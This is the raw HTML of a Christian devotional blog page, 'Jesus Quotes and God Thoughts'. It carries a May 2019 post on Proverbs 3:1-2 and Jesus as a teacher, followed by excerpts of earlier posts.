href="https://quotesthoughtsrandom.wordpress.com/additional-resources-you-may-be-interested-in/mark-a-good-news-book/">Mark &#8211; a &#8220;Good News&#8221; book</a></li> <li id="menu-item-11979" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11979"><a href="https://quotesthoughtsrandom.wordpress.com/additional-resources-you-may-be-interested-in/mark-a-good-news-book-2/">Luke &#8211; a &#8220;Good News&#8221; book</a></li> <li id="menu-item-11980" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11980"><a href="https://quotesthoughtsrandom.wordpress.com/additional-resources-you-may-be-interested-in/john-a-good-news-book/">John &#8211; a &#8220;Good News&#8221; book</a></li> <li id="menu-item-14422" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14422"><a href="https://quotesthoughtsrandom.wordpress.com/why-do-i-use-the-message-bible-what-about-translations/">Why do I use The Message Bible? What about translations?</a></li> </ul> </li> <li id="menu-item-13017" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-13017"><a href="https://quotesthoughtsrandom.wordpress.com/category/god-thoughts/teachings/">Teachings</a></li> <li id="menu-item-13018" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-13018"><a href="https://quotesthoughtsrandom.wordpress.com/category/god-thoughts/personal-thoughts/">Personal Thoughts</a></li> </ul> </nav><!-- end #menu --> <div id="main-title"> <hgroup> <h1 id="site-title"><a href="https://quotesthoughtsrandom.wordpress.com/" title="Jesus Quotes and God Thoughts" rel="home">Jesus Quotes and God Thoughts</a></h1> <h2 id="site-description">~ “God’s wisdom is something mysterious that goes deep into the interior of his purposes.” ~Apostle Paul</h2> </hgroup> </div><!-- end #main-title --> <div id="search"> <form method="get" action="https://quotesthoughtsrandom.wordpress.com//" > <div> <label for="s" class="assistive-text">Search:</label> <input type="text" value="Search&hellip;" name="s" id="s" onfocus="this.value=''" /> <input type="submit" name="search" value="Go" /> </div> </form> </div><!-- end #search --> <div id="main-image"> </div><!-- end #main-image --> </header><!-- #branding --> <div id="main" class="clear-fix"> <div id="primary"> <div id="content" class="clear-fix" role="main"> <article id="post-13098" class="post-13098 post type-post status-publish format-standard sticky hentry category-god-thoughts tag-good-news"> <header class="post-title"> <hgroup> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2018/01/01/welcome/" rel="bookmark">Welcome</a></h1> <h2 class="entry-format featured"><a href="https://quotesthoughtsrandom.wordpress.com/2018/01/01/welcome/" class="post-permalink">Featured</a></h2> </hgroup> <div class="post-info clear-fix"> <p> Posted <span class="by-author"> by <span class="author vcard"><a class="url fn n" href="https://quotesthoughtsrandom.wordpress.com/author/michaelwilson75078/" title="View all posts by Μιχαήλ (Michael) Wilson" rel="author">Μιχαήλ (Michael) Wilson</a></span></span> in <a href="https://quotesthoughtsrandom.wordpress.com/category/god-thoughts/" rel="category tag">God Thoughts</a> </p> <p class="post-com-count"> <strong>&asymp; <a href="https://quotesthoughtsrandom.wordpress.com/2018/01/01/welcome/#comments">7 Comments</a></strong> </p> </div><!-- end .post-info --> </header><!-- end .post-title --> <div class="post-content clear-fix"> <div class="post-extras"> <p><strong>Tags</strong></p><p><a href="https://quotesthoughtsrandom.wordpress.com/tag/good-news/" rel="tag">Good News</a></p> </div><!-- end .post-extras --> <div class="post-entry"> <p>Welcome to Jesus Quotes and God Thoughts. You might be interested in:</p> <ul> <li><a href="https://quotesthoughtsrandom.wordpress.com/category/teachings/" target="_blank" rel="noopener">Teachings</a> on the word of God <ul> <li>Consider <a href="https://quotesthoughtsrandom.wordpress.com/tag/joy" target="_blank" rel="noopener">joy</a>, <a href="https://quotesthoughtsrandom.wordpress.com/tag/love" target="_blank" rel="noopener">love</a>, <a href="https://quotesthoughtsrandom.wordpress.com/tag/peace" target="_blank" rel="noopener">peace</a>, <a href="https://quotesthoughtsrandom.wordpress.com/tag/kindness" target="_blank" rel="noopener">kindness</a>, <a href="https://quotesthoughtsrandom.wordpress.com/tag/meekness" target="_blank" rel="noopener">meekness</a>, <a href="https://quotesthoughtsrandom.wordpress.com/tag/goodness" target="_blank" rel="noopener">goodness</a>, <a href="https://quotesthoughtsrandom.wordpress.com/tag/faithfulness" target="_blank" rel="noopener">faithfulness</a>, <a href="https://quotesthoughtsrandom.wordpress.com/tag/hope" target="_blank" rel="noopener">hope</a>, <a href="https://quotesthoughtsrandom.wordpress.com/tag/self-control" target="_blank" rel="noopener">self-control</a>, <a href="https://quotesthoughtsrandom.wordpress.com/tag/justice" target="_blank" rel="noopener">justice</a>, <a href="https://quotesthoughtsrandom.wordpress.com/tag/patience" target="_blank" rel="noopener">patience</a>, and <a href="https://quotesthoughtsrandom.wordpress.com/tag/gentleness" target="_blank" rel="noopener">gentleness</a>.</li> </ul> </li> </ul> <h3 style="margin:0;font-family:Calibri;font-size:11pt;">How can I help you? Questions? Go <a href="https://quotesthoughtsrandom.wordpress.com/about/how-can-i-help-you-do-you-have-questions/">here</a> for help.</h3> <p>&nbsp;</p> <p> <a href="https://quotesthoughtsrandom.wordpress.com/2018/01/01/welcome/#more-13098" class="more-link">Continue reading <span class="meta-nav">&rarr;</span></a></p> <div class="wpcnt"> <div class="wpa wpmrec"> <span class="wpa-about">Advertisements</span> <div class="u"> <div style="padding-bottom:15px;width:300px;height:250px;float:left;margin-right:5px;margin-top:0px"> <div id="atatags-26942-5cdd8c3cd7cc7"> <script type="text/javascript"> __ATA.cmd.push(function() { __ATA.initSlot('atatags-26942-5cdd8c3cd7cc7', { collapseEmpty: 'before', sectionId: '26942', location: 120, width: 300, height: 250 }); }); </script> </div> </div></div> </div> </div> </div><!-- end .post-entry --> </div><!-- end .post-content --> </article><!-- #post-13098 --> <article id="post-15155" class="post-15155 post type-post status-publish format-standard hentry category-god-is-god category-god-thoughts tag-jesus tag-king-solomon tag-luke-20 tag-matthew-4 tag-proverbs-3 tag-rabbi tag-teach tag-teacher tag-wise-sayings"> <header class="post-title"> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/16/good-friend-dont-forget-all-ive-taught-you-take-to-heart-my-commands-theyll-help-you-live-a-long-long-time-a-long-life-lived-full-and-well-king-sol/" rel="bookmark">&#8220;Good friend, don’t forget all I’ve taught you; take to heart my commands. They’ll help you live a long, long time, a long life lived full and well.&#8221; ~King&nbsp;Solomon</a></h1> <a href="https://quotesthoughtsrandom.wordpress.com/2019/05/16/good-friend-dont-forget-all-ive-taught-you-take-to-heart-my-commands-theyll-help-you-live-a-long-long-time-a-long-life-lived-full-and-well-king-sol/" class="post-permalink"> <p class="post-date"> <strong>16</strong> <em>Thursday</em> <span>May 2019</span> </p> </a> <div class="post-info clear-fix"> <p> Posted <span class="by-author"> by <span class="author vcard"><a class="url fn n" href="https://quotesthoughtsrandom.wordpress.com/author/michaelwilson75078/" title="View all posts by Μιχαήλ (Michael) Wilson" rel="author">Μιχαήλ (Michael) Wilson</a></span></span> in <a href="https://quotesthoughtsrandom.wordpress.com/category/god-thoughts/god-is-god/" rel="category tag">God is God</a>, <a href="https://quotesthoughtsrandom.wordpress.com/category/god-thoughts/" rel="category tag">God Thoughts</a> </p> <p class="post-com-count"> <strong>&asymp; <a href="https://quotesthoughtsrandom.wordpress.com/2019/05/16/good-friend-dont-forget-all-ive-taught-you-take-to-heart-my-commands-theyll-help-you-live-a-long-long-time-a-long-life-lived-full-and-well-king-sol/#respond">Leave a comment</a></strong> </p> </div><!-- end .post-info --> </header><!-- end .post-title --> <div class="post-content clear-fix"> <div class="post-extras"> <p><strong>Tags</strong></p><p><a href="https://quotesthoughtsrandom.wordpress.com/tag/jesus/" rel="tag">Jesus</a>, <a href="https://quotesthoughtsrandom.wordpress.com/tag/king-solomon/" rel="tag">King Solomon</a>, <a href="https://quotesthoughtsrandom.wordpress.com/tag/luke-20/" rel="tag">Luke 20</a>, <a href="https://quotesthoughtsrandom.wordpress.com/tag/matthew-4/" rel="tag">Matthew 4</a>, <a href="https://quotesthoughtsrandom.wordpress.com/tag/proverbs-3/" rel="tag">Proverbs 3</a>, <a href="https://quotesthoughtsrandom.wordpress.com/tag/rabbi/" rel="tag">Rabbi</a>, <a href="https://quotesthoughtsrandom.wordpress.com/tag/teach/" rel="tag">Teach</a>, <a href="https://quotesthoughtsrandom.wordpress.com/tag/teacher/" rel="tag">Teacher</a>, <a href="https://quotesthoughtsrandom.wordpress.com/tag/wise-sayings/" rel="tag">Wise Sayings</a></p> </div><!-- end .post-extras --> <div class="post-entry"> <div data-shortcode="caption" id="attachment_15156" style="width: 160px" class="wp-caption alignright"><img aria-describedby="caption-attachment-15156" data-attachment-id="15156" data-permalink="https://quotesthoughtsrandom.wordpress.com/2019/05/16/good-friend-dont-forget-all-ive-taught-you-take-to-heart-my-commands-theyll-help-you-live-a-long-long-time-a-long-life-lived-full-and-well-king-sol/jesus-teaching/" data-orig-file="https://quotesthoughtsrandom.files.wordpress.com/2018/10/jesus-teaching.jpg" data-orig-size="360,240" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Jesus Teaching" data-image-description="" data-medium-file="https://quotesthoughtsrandom.files.wordpress.com/2018/10/jesus-teaching.jpg?w=300" data-large-file="https://quotesthoughtsrandom.files.wordpress.com/2018/10/jesus-teaching.jpg?w=360" class="size-thumbnail wp-image-15156" src="https://quotesthoughtsrandom.files.wordpress.com/2018/10/jesus-teaching.jpg?w=150&#038;h=100" alt="" width="150" height="100" srcset="https://quotesthoughtsrandom.files.wordpress.com/2018/10/jesus-teaching.jpg?w=150&amp;h=100 150w, https://quotesthoughtsrandom.files.wordpress.com/2018/10/jesus-teaching.jpg?w=300&amp;h=200 300w" sizes="(max-width: 150px) 100vw, 150px" /><p id="caption-attachment-15156" class="wp-caption-text">Jesus Teaching</p></div> <p>I want to live long. I want to live well. I want to live long. There is very good news. God gives me wisdom. As a disciple of Jesus, I have the Master Teacher. I also have the power of His Holy Spirit. I need to focus on taking God&#8217;s direction to heart.</p> <p style="padding-left:30px;"><span style="text-decoration:underline;"><strong><em>Good friend, don’t forget all I’ve taught you; take to heart my commands. They’ll help you live a long, long time, a long life lived full and well.</em></strong></span> | Proverbs 3:1-2 (The Message Bible)</p> <p>The focus here is on teaching. <span style="text-decoration:underline;color:#993300;"><strong>Jesus is the Master Teacher.</strong></span> I have a lot to learn.</p> <p>It is clear from the good news books that Jesus had a reputation as a Jewish rabbi (Mark 14:45; John 1:38). Peter (in Mark 9:5) and Mary Magdalene (in John 20:16) both referred to Jesus as “Rabbi.”</p> <p>Moreover, the Jewish ruler Nicodemus thought that this title was appropriate for Jesus: “Rabbi, we know that you are a teacher who has come from God. For no one could perform the signs you are doing if God were not with him” (John 3:2). Elsewhere, we see Jesus referred to as “Teacher” (Mark 5:35). According to John 1:38, Rabbi and Teacher are synonymous titles.</p> <h3><strong>Jesus Was a Teacher Who Taught With Power</strong></h3> <p>Jesus began his ministry by engaging people in the synagogue as a public teacher. This teaching was an activity open to any layman who was willing to be taught.</p> <p style="padding-left:30px;"><em>Jesus went throughout Galilee, <strong>teaching</strong> in their synagogues, proclaiming the good news of the kingdom, and healing every disease and sickness among the people.</em> | Matthew 4:23</p> <p>The public teaching of Jesus, in the Gospel of Matthew, was surrounded by his healing ministry. During his teaching ministry, Christ also healed the multitudes of every kind of problem. This teaching/healing ministry also addressed the spiritual world of the demons.</p> <p>In all of his teaching and healing exercises, the primary foundational truth that Jesus was promoting was a simple one.</p> <p style="padding-left:30px;"><em>“Jesus went throughout Galilee, <strong>teaching</strong> in their synagogues, proclaiming the good news of the kingdom, and healing every disease and sickness among the people. News about him spread all over Syria, and people brought to him all who were ill with various diseases, those suffering severe pain, the demon-possessed, those having seizures, and the paralyzed; and he healed them.”</em> | Matthew 4:23-24</p> <h3><strong>Jesus Was a Teacher Who Taught With Authority and Purpose</strong></h3> <p>On several occasions, Jesus was approached and questioned about his authority as a leader. In Luke’s Good News account, Jesus was asked about his authority.</p> <p style="padding-left:30px;"><em>“One day as Jesus was <strong>teaching</strong> the people in the temple courts and proclaiming the good news, the chief priests and the teachers of the law, together with the elders, came up to him.  “Tell us by what authority you are doing these things,” they said. “Who gave you this authority?”</em></p> <p style="padding-left:30px;"><em>He replied, “I will also ask you a question. Tell me:  John’s baptism—was it from heaven, or of human origin?”</em></p> <p style="padding-left:30px;"><em>They discussed it among themselves and said, “If we say, ‘From heaven,’ he will ask, ‘Why didn’t you believe him?’  But if we say, ‘Of human origin,’ all the people will stone us, because they are persuaded that John was a prophet.”</em></p> <p style="padding-left:30px;"><em>So they answered, “We don’t know where it was from.”</em></p> <p style="padding-left:30px;"><em>Jesus said, “<span style="text-decoration:underline;"><strong>Neither will I tell you by what authority I am doing these things.</strong></span>” </em>| Luke 20:1-8</p> <p>&nbsp;</p> <div id="atatags-370373-5cdd8c3cd96f7"> <script type="text/javascript"> __ATA.cmd.push(function() { __ATA.initVideoSlot('atatags-370373-5cdd8c3cd96f7', { sectionId: '370373', format: 'inread' }); }); </script> </div> </div><!-- end .post-entry --> </div><!-- end .post-content --> </article><!-- #post-15155 --> <div class="more-posts"> <h2 class="notice">Previous articles</h2> <div id="more-posts-inner"> <div class="clear-fix"><article id="post-16804" class="post-16804 post type-post status-publish format-standard hentry category-god-is-good category-god-thoughts tag-jesus tag-lost-sheep tag-testimony"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/15/god-is-good-and-in-a-good-mood-lauras-story-proves-it/" rel="bookmark">God is good and in a good mood. Laura&#8217;s story proves&nbsp;it!</a></h1> </header> <span>May 15, 2019</span> <p>The Background I am fortunate to meet some amazing people on Twitter. I recently met Laura in a very protracted &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/15/god-is-good-and-in-a-good-mood-lauras-story-proves-it/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16804 --> <article id="post-15153" class="post-15153 post type-post status-publish format-standard hentry category-god-is-god category-god-thoughts tag-anger tag-jesus tag-jesus-sayings tag-john-3 tag-wrath"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/15/he-who-believes-in-the-son-has-eternal-life-but-he-who-does-not-obey-the-son-will-not-see-life-but-the-wrath-of-god-abides-on-him-jesus/" rel="bookmark">“He who believes in the Son has eternal life; but he who does not obey the Son will not see life, but the wrath of God abides on him.”&nbsp;~Jesus</a></h1> </header> <span>May 15, 2019</span> <p>Does Jesus get angry and upset? Jesus the Messiah shows controlled emotion arising from his unswerving opposition to evil and &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/15/he-who-believes-in-the-son-has-eternal-life-but-he-who-does-not-obey-the-son-will-not-see-life-but-the-wrath-of-god-abides-on-him-jesus/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15153 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16801" class="post-16801 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-respect tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/14/how-do-we-show-respect-for-gods-name/" rel="bookmark">How do we show respect for God’s&nbsp;name?</a></h1> </header> <span>May 14, 2019</span> <p>I am to respect God. I am to show respect for His holy name. I should not take His name &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/14/how-do-we-show-respect-for-gods-name/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16801 --> <article id="post-15149" class="post-15149 post type-post status-publish format-standard hentry category-god-is-good category-god-thoughts tag-acts-5 tag-luke-sayings tag-master-jesus tag-trust"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/14/those-who-put-their-trust-in-the-master-were-added-right-and-left-men-and-women-both-luke/" rel="bookmark">&#8220;Those who put their trust in the Master were added right and left, men and women both.&#8221;&nbsp;~Luke</a></h1> </header> <span>May 14, 2019</span> <p>Have I trusted in the Master Jesus? What a change occurred to the early disciples of Jesus. The power of &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/14/those-who-put-their-trust-in-the-master-were-added-right-and-left-men-and-women-both-luke/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15149 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16790" class="post-16790 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-heal tag-healing tag-heaven tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/13/is-heaven-the-place-of-ultimate-healing/" rel="bookmark">Is Heaven the place of ultimate&nbsp;healing?</a></h1> </header> <span>May 13, 2019</span> <p>We go through a lot as a part of our human existence. I get sick. Sickness follows me from birth &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/13/is-heaven-the-place-of-ultimate-healing/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16790 --> <article id="post-15147" class="post-15147 post type-post status-publish format-standard hentry category-god-is-god category-god-thoughts tag-matthew-28"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/13/youre-holding-on-to-me-for-dear-life-dont-be-frightened-like-that-jesus/" rel="bookmark">&#8220;You’re holding on to me for dear life! Don’t be frightened like that.&#8221;&nbsp;~Jesus</a></h1> </header> <span>May 13, 2019</span> <p>And then Jesus met them. Imagine. They had witnessed Jesus being cruelly murdered. They had seen entombed. They came to &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/13/youre-holding-on-to-me-for-dear-life-dont-be-frightened-like-that-jesus/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15147 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16785" class="post-16785 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-follow tag-healing tag-jesus tag-miracles tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/12/why-did-those-who-were-healed-by-jesus-follow-him/" rel="bookmark">Why did those who were healed by Jesus follow&nbsp;Him?</a></h1> </header> <span>May 12, 2019</span> <p>Jesus has healed me. What should I do? Just move on with life like it didn’t happen? Not at all. &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/12/why-did-those-who-were-healed-by-jesus-follow-him/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16785 --> <article id="post-15145" class="post-15145 post type-post status-publish format-standard hentry category-god-is-god category-god-thoughts tag-1-john tag-god-is-god tag-god-is-good tag-hate tag-surprise tag-surprised tag-world"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/12/do-not-be-surprised-brethren-if-the-world-hates-you-apostle-john/" rel="bookmark">&#8220;Do not be surprised, brethren, if the world hates you.&#8221; ~Apostle&nbsp;John</a></h1> </header> <span>May 12, 2019</span> <p>The surprises along the way are God’s surprises. He is never caught off guard or unprepared. He calls me to &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/12/do-not-be-surprised-brethren-if-the-world-hates-you-apostle-john/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15145 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16779" class="post-16779 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-teachings tag-thankful tag-thanks"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/11/how-do-we-show-thankfulness-for-jesus-the-messiah/" rel="bookmark">How do we show thankfulness for Jesus the&nbsp;Messiah?</a></h1> </header> <span>May 11, 2019</span> <p>I am so thankful to my Master Jesus, the Messiah. I want to shout. I sing about His greatness. I &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/11/how-do-we-show-thankfulness-for-jesus-the-messiah/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16779 --> <article id="post-15135" class="post-15135 post type-post status-publish format-standard hentry category-god-is-god category-god-thoughts tag-faith tag-fasting tag-jesus tag-jesus-sayings tag-love tag-mark-9 tag-power tag-prayer"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/11/there-is-no-way-to-get-rid-of-this-kind-of-demon-except-by-prayer-jesus/" rel="bookmark">“There is no way to get rid of this kind of demon except by prayer.”&nbsp;~Jesus</a></h1> </header> <span>May 11, 2019</span> <p>Jesus has to step in to solve a very real problem. That is the way of Jesus. He just doesn&#8217;t &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/11/there-is-no-way-to-get-rid-of-this-kind-of-demon-except-by-prayer-jesus/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15135 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16771" class="post-16771 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-glorify tag-magnify tag-praise tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/10/can-we-magnify-god-through-our-praise/" rel="bookmark">Can we magnify God through our&nbsp;praise?</a></h1> </header> <span>May 10, 2019</span> <p>I must give God a big shout out! God is beautiful. God is stunning. God is awesome! Now here is &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/10/can-we-magnify-god-through-our-praise/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16771 --> <article id="post-15133" class="post-15133 post type-post status-publish format-standard hentry category-god-is-good category-god-thoughts tag-compassion tag-gently tag-jesus tag-jesus-sayings tag-leper tag-love tag-mark-1"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/10/i-am-willing-be-cleansed-jesus/" rel="bookmark">“I am willing; be cleansed.”&nbsp;~Jesus</a></h1> </header> <span>May 10, 2019</span> <p>I have a lot to learn from Jesus. Jesus is gentle and shows compassion. Jesus has compassion for those in &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/10/i-am-willing-be-cleansed-jesus/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15133 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16767" class="post-16767 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-anxiety tag-gods-will tag-plans tag-teachings tag-worry"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/09/should-our-plans-be-subject-to-gods-will/" rel="bookmark">Should our plans be subject to God’s&nbsp;will?</a></h1> </header> <span>May 9, 2019</span> <p>Jesus is clear. In his manifesto (Matthew 5-7), Jesus tells us to pray like this: “Your will be done, on &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/09/should-our-plans-be-subject-to-gods-will/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16767 --> <article id="post-15129" class="post-15129 post type-post status-publish format-standard hentry category-god-is-good category-god-thoughts tag-3-john tag-apostle-john-sayings tag-gaius tag-jesus tag-joy tag-truth"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/09/i-have-no-greater-joy-than-this-to-hear-of-my-children-walking-in-the-truth-apostle-john/" rel="bookmark">&#8220;I have no greater joy than this, to hear of my children walking in the truth.&#8221; ~Apostle&nbsp;John</a></h1> </header> <span>May 9, 2019</span> <p>There is great joy when our brothers and sisters walk in the truth of the Master Jesus. I want to &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/09/i-have-no-greater-joy-than-this-to-hear-of-my-children-walking-in-the-truth-apostle-john/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15129 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16754" class="post-16754 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-pure tag-purity tag-sin tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/08/does-jesus-the-messiah-purify-believers/" rel="bookmark">Does Jesus the Messiah purify&nbsp;believers?</a></h1> </header> <span>May 8, 2019</span> <p>I confess to God that I have missed His goal for my life (aka sin). That has me walking in &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/08/does-jesus-the-messiah-purify-believers/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16754 --> <article id="post-15125" class="post-15125 post type-post status-publish format-standard hentry category-god-is-god category-god-thoughts tag-heavenly-father tag-jesus tag-jesus-sayings tag-love tag-son-of-god"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/08/im-telling-you-this-straight-the-son-cant-independently-do-a-thing-only-what-he-sees-the-father-doing-jesus/" rel="bookmark">“I’m telling you this straight. The Son can’t independently do a thing, only what he sees the Father doing.&#8221;&nbsp;~Jesus</a></h1> </header> <span>May 8, 2019</span> <p>Jesus has just completed a stunning miracle. A man had been disabled for 38 years, unable to walk. Jesus healed &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/08/im-telling-you-this-straight-the-son-cant-independently-do-a-thing-only-what-he-sees-the-father-doing-jesus/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15125 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16748" class="post-16748 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-achievement tag-gods-will tag-purpose tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/07/are-gods-purposes-always-accomplished/" rel="bookmark">Are God’s purposes always&nbsp;accomplished?</a></h1> </header> <span>May 7, 2019</span> <p>God is God. Nothing is impossible with God. His plan will be accomplished. I can count on it. I may &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/07/are-gods-purposes-always-accomplished/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16748 --> <article id="post-15123" class="post-15123 post type-post status-publish format-standard hentry category-god-is-god category-god-thoughts tag-family tag-genesis-1 tag-genesis-2 tag-marriage"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/07/be-fruitful-and-increase-in-number-fill-the-earth-and-subdue-it-god/" rel="bookmark">&#8220;Be fruitful and increase in number; fill the earth and subdue it.&#8221;&nbsp;~God</a></h1> </header> <span>May 7, 2019</span> <p>Family is extremely important in the Bible, both in a physical sense and in a spiritual sense. The foundation of &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/07/be-fruitful-and-increase-in-number-fill-the-earth-and-subdue-it-god/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15123 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16746" class="post-16746 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-apostle-john-sayings tag-jesus-questions tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/06/35-questions-that-jesus-asks-in-the-good-news-according-to-john-2/" rel="bookmark">35 Questions that Jesus Asks in the Good News According to&nbsp;John</a></h1> </header> <span>May 6, 2019</span> <p>It is stunning how masterfully our Master Jesus, the Messiah, uses questions (read more here) to teach vital spiritual truths.  &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/06/35-questions-that-jesus-asks-in-the-good-news-according-to-john-2/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16746 --> <article id="post-15115" class="post-15115 post type-post status-publish format-standard hentry category-god-is-good category-god-thoughts tag-help tag-korah tag-protect tag-psalm-46 tag-safety tag-strength tag-wise-sayings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/06/god-is-a-safe-place-to-hide-ready-to-help-when-we-need-him-sons-of-korah/" rel="bookmark">&#8220;God is a safe place to hide, ready to help when we need him.&#8221; ~Sons of&nbsp;Korah</a></h1> </header> <span>May 6, 2019</span> <p>I can trust God. God provides me a safe place. Some days we all need a refuge or even a &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/06/god-is-a-safe-place-to-hide-ready-to-help-when-we-need-him-sons-of-korah/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15115 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16731" class="post-16731 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-faithfulness tag-servant tag-service tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/05/what-does-faithfulness-look-like-in-serving-others/" rel="bookmark">What does faithfulness look like in serving&nbsp;others?</a></h1> </header> <span>May 5, 2019</span> <p>I am to do good to all people. I must be faithful to God’s goal to love my neighbor. I &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/05/what-does-faithfulness-look-like-in-serving-others/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16731 --> <article id="post-15109" class="post-15109 post type-post status-publish format-standard hentry category-god-thoughts category-gods-goal tag-apostle-paul-sayings tag-holy tag-pure tag-purity tag-repent tag-titus-1"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/05/to-the-pure-all-things-are-pure-apostle-paul/" rel="bookmark">&#8220;To the pure, all things are pure.&#8221; ~Apostle&nbsp;Paul</a></h1> </header> <span>May 5, 2019</span> <p>Jesus challenges me. “Happy are the pure in heart, for they will see God.” To the pure, all things are &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/05/to-the-pure-all-things-are-pure-apostle-paul/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15109 --> </div><!-- end clear-fix --><div 